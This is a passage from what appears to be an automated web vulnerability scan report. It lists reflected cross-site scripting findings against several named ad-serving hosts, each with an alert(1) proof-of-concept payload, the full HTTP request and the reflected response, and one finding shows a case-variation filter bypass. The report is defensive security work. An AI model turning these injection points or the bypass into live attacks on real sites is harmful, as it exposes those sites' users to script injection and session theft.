The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload 291e4<ScRiPt>alert(1)</ScRiPt>643b283f84c was submitted in the zi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks, but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att02&cid=0511wl728x90&c=att02cont12&w=728&h=90&zi=10002291e4<ScRiPt>alert(1)</ScRiPt>643b283f84c&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOgDAIheGrGGabUCjt002rnsa4ORnvLrj9X8ILD6nSPMgEreNAKo4mhlxc2UFdodi3nFhqSeWYJK0rI4F5YaAffdsppnHcTLiF5FeUeVVTeBbP6z5Pzxp_WCy_H4MVGc4-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:35:15 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5739
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
om/assets/adicon.png",icon_cam_daa:"http://choices.truste.com/assets/ad_choices_i.png",icon_cam_mo:"http://choices.truste.com/assets/ad_choices_en.png",iconText:"",aid:"att02",pid:"mec01",zindex:"10002291e4<ScRiPt>alert(1)</ScRiPt>643b283f84c",cam:"2",cid:"0511wl728x90",optoutLink:"http://preferences.truste.com/preference.html?affiliateId=16&pid=mec01&aid=att02&cid=0511wl728x90&w=728&h=90",target:"over"};
truste.ca.bindingInitMap[te_clr1_8
...[SNIP]...

4.102. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-507/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57523'%3balert(1)//761ebfa4333 was submitted in the $ parameter. This input was echoed as 57523';alert(1)//761ebfa4333 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=collective728x9057523'%3balert(1)//761ebfa4333&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:collective728x9057523';alert(1)//761ebfa4333,collective728x90ddc3c';expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:951,2,0:0,2,14:951,0,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=91:90:10:10:10:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=18
Expires: Sat, 17 Sep 2011 01:50:08 GMT
Date: Sat, 17 Sep 2011 01:49:50 GMT
Content-Length: 2676
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='collective728x9057523';alert(1)//761ebfa4333,collective728x90ddc3c'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=collective728x9057523';alert(1)//761ebfa4333,collective728x90ddc3c';z="+Math.random();}

if(zzuid=='
...[SNIP]...

4.103. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-507/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cd0e"-alert(1)-"31d922bac00 was submitted in the $ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=collective728x902cd0e"-alert(1)-"31d922bac00&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:collective728x902cd0e"-alert(1)-"31d922bac00,collective728x9016082%22%3b2f389a5ae83,collective728x9016082";expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:951,2,0:0,2,14:951,0,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=89:88:10:10:10:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=18
Expires: Sat, 17 Sep 2011 01:50:08 GMT
Date: Sat, 17 Sep 2011 01:49:50 GMT
Content-Length: 2754
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='collective728x902cd0e"-alert(1)-"31d922bac00,collective728x9016082%22%3b2f389a5ae83,collective728x9016082"';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=collective728x902cd0e"-alert(1)-"31d922bac00,collective728x9016082%22%3b2f389a5ae83,collective728x9016082";z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;


...[SNIP]...

4.104. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-507/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c82c2'%3balert(1)//7d572232822 was submitted in the q parameter. This input was echoed as c82c2';alert(1)//7d572232822 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=c82c2'%3balert(1)//7d572232822&$=collective728x90&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c'$0:collective728x90;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:951,2,0:0,2,14:951,0,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=77:76:10:10:10:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=23
Expires: Sat, 17 Sep 2011 01:50:08 GMT
Date: Sat, 17 Sep 2011 01:49:45 GMT
Content-Length: 2750
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='c82c2';alert(1)//7d572232822,284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=c82c2';alert(1)//7d572232822,284b8'-alert(1)-'0
...[SNIP]...

4.105. http://event.adxpose.com/event.flow [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 569f5<script>alert(1)</script>cbb22875fc7 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2F3ps.go.com%2FDynamicAd%3Fsrvc%3Dabc%26adTypes%3DRectangles-Remnant%26url%3D%2Fshows%2Fcharlies-angels&uid=TVYMYp4lQTRs9JsS_40691310569f5<script>alert(1)</script>cbb22875fc7&xy=0%2C0&wh=300%2C250&vchannel=41471866&cid=3941858&iad=1316239136911-64316275808960200&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.3&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/80181/197812/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=214EE77DC665E937F45E21D15B56E7C0; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 147
Date: Sat, 17 Sep 2011 01:03:37 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("TVYMYp4lQTRs9JsS_40691310569f5<script>alert(1)</script>cbb22875fc7");

4.106. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da1f4"-alert(1)-"f4229a086fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dcda1f4"-alert(1)-"f4229a086fa/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7A00B96A0D964F453E5BD8D5810F10FB; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:59 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dcda1f4"-alert(1)-"f4229a086fa/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPho
...[SNIP]...

4.107. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2023a"-alert(1)-"ff30b4aa7a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/103392023a"-alert(1)-"ff30b4aa7a4/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A971275997FA7630761B5092947B1A05; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:08:00 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/103392023a"-alert(1)-"ff30b4aa7a4/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome
...[SNIP]...

4.108. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db706"-alert(1)-"9cd6414e8aa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10339/128628db706"-alert(1)-"9cd6414e8aa/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A049BAB0531C29E6EC384F93AA842C69; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:08:00 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628db706"-alert(1)-"9cd6414e8aa/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "fal
...[SNIP]...

4.109. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 114c3"-alert(1)-"fc47482de42 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10339/128628/adi114c3"-alert(1)-"fc47482de42/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1DB5C21D80F320C04F41B642CF20125A; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:08:01 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628/adi114c3"-alert(1)-"fc47482de42/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
...[SNIP]...

4.110. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b6a7"-alert(1)-"c3bd8bd988d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA6b6a7"-alert(1)-"c3bd8bd988d/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1DCCDAFA24DD21FDF6463237374426AC; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:08:02 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628/adi/N4682.126265.CASALEMEDIA6b6a7"-alert(1)-"c3bd8bd988d/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000"
...[SNIP]...

4.111. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 640d2"-alert(1)-"0338569564a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9640d2"-alert(1)-"0338569564a;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6B61580EFD1DC69FFF19E25E19111CA1; Path=/
